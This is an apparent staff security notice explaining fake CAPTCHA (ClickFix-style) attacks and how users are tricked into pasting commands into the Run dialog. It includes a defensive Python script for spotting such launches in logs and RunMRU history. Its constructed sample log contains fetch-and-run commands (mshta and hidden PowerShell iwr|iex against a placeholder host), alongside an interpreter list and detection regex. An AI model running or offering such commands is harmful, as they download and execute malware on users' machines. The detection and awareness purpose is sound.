Many websites use CAPTCHA prompts (those small prompts asking you to confirm you’re not a robot) as a security measure. Unfortunately, malicious actors are now mimicking these prompts in a new method of attack that can compromise your computer with just a few keystrokes.
These fake CAPTCHA attacks are becoming more common and are quite effective because they often appear on websites that users trust, such as news and educational websites. The goal is to trick users into unknowingly running commands that install malicious software.
How the attack works
A user visits a legitimate website that has unknowingly allowed a malicious advertisement to be displayed through a third-party ad server. When the ad appears, the user is redirected to a malicious site displaying a fake CAPTCHA. After the user clicks the CAPTCHA checkbox, a prompt appears asking them to press a combination of keys such as WIN+R, CTRL+V and Enter (example below).
The keystrokes do the attacker's work for them: clicking the checkbox silently copies a command onto the clipboard, WIN+R opens the Windows Run dialog, CTRL+V pastes that command into it, and Enter runs it. The command downloads and installs malware with no visible sign that anything happened. Because the attack dresses up a routine "prove you're human" step and arrives through sites we normally trust, it can be quite deceptive.
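For the technology team, here is an added example (not part of the original notice) of how this pattern can be spotted after the fact. A command pasted into the Run dialog starts with explorer.exe as its parent process, so process-creation logs that record parent and child images can be searched for interpreters launched that way with download-and-run traits; Windows also keeps Run-dialog history under the RunMRU registry key. The log lines, field layout and RunMRU values below are constructed for the example, and the interpreter list and command-line patterns are assumptions, not indicators taken from any specific incident.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation records (not from a real incident).
SAMPLE_LOG = r"""
2024-05-02T09:14:03Z ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\mshta.exe CommandLine="mshta https://example.invalid/verify.hta"
2024-05-02T09:14:05Z ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -w hidden -c iwr https://example.invalid/p.txt | iex"
2024-05-02T09:20:11Z ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\notepad.exe CommandLine="notepad.exe C:\Users\a\notes.txt"
2024-05-02T09:21:44Z ParentImage=C:\Program Files\Code\Code.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -File build.ps1"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) ParentImage=(?P<parent>.+?) Image=(?P<image>.+?) CommandLine="(?P<cmd>.*)"$'
)

# Interpreters a pasted Run-dialog command typically invokes (assumed list).
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
           "curl.exe", "wscript.exe", "cscript.exe"}

# Command-line traits that point at fetch-and-run behaviour (assumed patterns).
REMOTE_EXEC_RE = re.compile(
    r"https?://|\biex\b|invoke-expression|\biwr\b|invoke-webrequest"
    r"|downloadstring|-w(?:indowstyle)?\s+hidden",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class ProcEvent:
    ts: str
    parent: str   # basename of the parent image, lower-cased
    image: str    # basename of the child image, lower-cased
    cmd: str


def parse_log(text: str) -> list[ProcEvent]:
    """Parse the constructed log format into ProcEvent records."""
    events = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that are not process-creation records
        events.append(ProcEvent(
            m["ts"],
            PureWindowsPath(m["parent"]).name.lower(),
            PureWindowsPath(m["image"]).name.lower(),
            m["cmd"],
        ))
    return events


def flag_clickfix(events: list[ProcEvent]) -> list[ProcEvent]:
    """Return events matching the Run-dialog fetch-and-run shape:
    explorer.exe parent, interpreter child, remote-execution traits."""
    return [
        e for e in events
        if e.parent == "explorer.exe"
        and e.image in LOLBINS
        and REMOTE_EXEC_RE.search(e.cmd)
    ]


def suspicious_runmru(values: dict[str, str]) -> list[str]:
    """Scan an exported RunMRU key (value name -> data). Windows stores each
    Run-dialog entry as '<command>\\1' and the order, most recent first, in
    'MRUList'. Returns the commands that look like interpreter launches."""
    out = []
    for name in values.get("MRUList", ""):
        data = values.get(name, "")
        cmd = data[:-2] if data.endswith("\\1") else data
        tokens = cmd.split()
        exe = tokens[0].lower() if tokens else ""
        base = exe if exe.endswith(".exe") else exe + ".exe"
        if base in LOLBINS or REMOTE_EXEC_RE.search(cmd):
            out.append(cmd)
    return out


if __name__ == "__main__":
    for hit in flag_clickfix(parse_log(SAMPLE_LOG)):
        print(f"{hit.ts} {hit.parent} -> {hit.image}: {hit.cmd}")
    # Constructed RunMRU export, most recent entry first in MRUList.
    print(suspicious_runmru({
        "a": "notepad\\1",
        "b": "mshta https://example.invalid/verify.hta\\1",
        "MRUList": "ba",
    }))
```

On the constructed log, the two explorer.exe-parented launches of mshta.exe and powershell.exe with a URL or hidden-window flag are flagged, while the notepad launch and the powershell.exe started by an editor are not. The RunMRU check is useful on a machine a user has already reported, because the pasted command remains in that key even after the malware has cleaned up after itself.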
What should you do?
If a CAPTCHA prompt ever asks you to press keyboard shortcuts like WIN+R or CTRL+V, DO NOT follow these instructions. A legitimate CAPTCHA never requires keyboard input beyond clicking a checkbox, selecting images, typing the characters shown or sliding a puzzle piece. If you have already pressed the keys, do not assume nothing happened; the installation is silent, so report it right away.
If you encounter any unusual prompts or website behavior, report it to technology right away. Quick reporting allows us to take immediate action and helps protect our staff, students, and community from these malicious actors.
In case you were wondering, CAPTCHA stands for Completely Automated Public Turing test to tell Computers and Humans Apart.